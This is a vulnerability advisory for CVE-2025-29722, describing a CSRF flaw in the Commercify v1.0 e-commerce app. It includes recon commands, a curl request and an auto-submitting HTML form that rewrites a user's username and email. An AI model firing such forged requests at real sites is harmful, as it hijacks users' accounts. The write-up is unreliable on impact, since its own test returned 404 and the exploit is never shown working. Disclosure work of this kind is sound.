# 🛡️ CVE-2025-29722 – Cross Site Request Forgery (CSRF) in Commercify v1.0  
**Discovered by: David P.S Abraham (aka Davycipher)**

---

##  CVE ID

**CVE-2025-29722** has been assigned to this vulnerability by [MITRE Corporation](https://cve.mitre.org/).

---

##  Summary

A **CSRF vulnerability** was identified in **Commercify v1.0**, an open-source e-commerce platform developed by [@yassmittal](https://github.com/yassmittal). The application lacks proper CSRF protection mechanisms on critical endpoints such as `/update_settings`, allowing attackers to craft malicious requests that modify user data when executed from another domain.

---

##  Affected Product

- **Product Name:** Commercify
- **Version:** 1.0
- **Repository:** [https://github.com/yassmittal/Commercify](https://github.com/yassmittal/Commercify)

---

##  Vulnerability Type

- CWE-352: Cross-Site Request Forgery (CSRF)

---

##  Exploitation Walkthrough

### Recon Phase

 `nmap` scan revealed that the service was accessible via port `5173`, indicating a possible development server.

```bash
nmap -p 5173 localhost
```

Next, I scanned the app using `nikto`, revealing:

- Missing `X-Frame-Options` header
- Permissive CORS policy (`Access-Control-Allow-Origin: *`)
- Lack of CSRF protection headers

###  Endpoint Brute Forcing

While exploring the application, I suspected a possible `update_settings` endpoint based on the user dashboard features. I tested it with:

```bash
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&email=attacker@example.com"
```

Though a `404 Not Found` was returned, this behavior can be environment-dependent. On valid deployments, this could lead to full account manipulation.

---

##  Proof of Concept (PoC)

HTML-based attack to exploit the CSRF flaw:

```html
<form action="http://localhost:5173/update_settings" method="POST">
  <input type="hidden" name="username" value="attacker">
  <input type="hidden" name="email" value="attacker@example.com">
</form>
<script>
  document.forms[0].submit();
</script>
```


##  Impact

- Unauthorized changes to user account data
- Privilege escalation if settings include role or email manipulation
- Account takeover scenarios

---

##  Root Cause

- Lack of CSRF tokens
- No `SameSite` cookie attribute
- Permissive CORS (`*`)
- No referer or origin validation

---

##  Mitigation & Recommendations

- Add CSRF tokens for all state-changing endpoints
- Set `SameSite=Strict` or `Lax` on cookies
- Define strict CORS policies
- Implement origin/referer validation

---

##  Discoverer

**David P.S. Abraham**  
Alias: **Davycipher**  
- [GitHub](https://github.com/cypherdavy)  
- [LinkedIn](https://linkedin.com/in/davy-cypher)  
- [Website](https://davycipher.online)

---
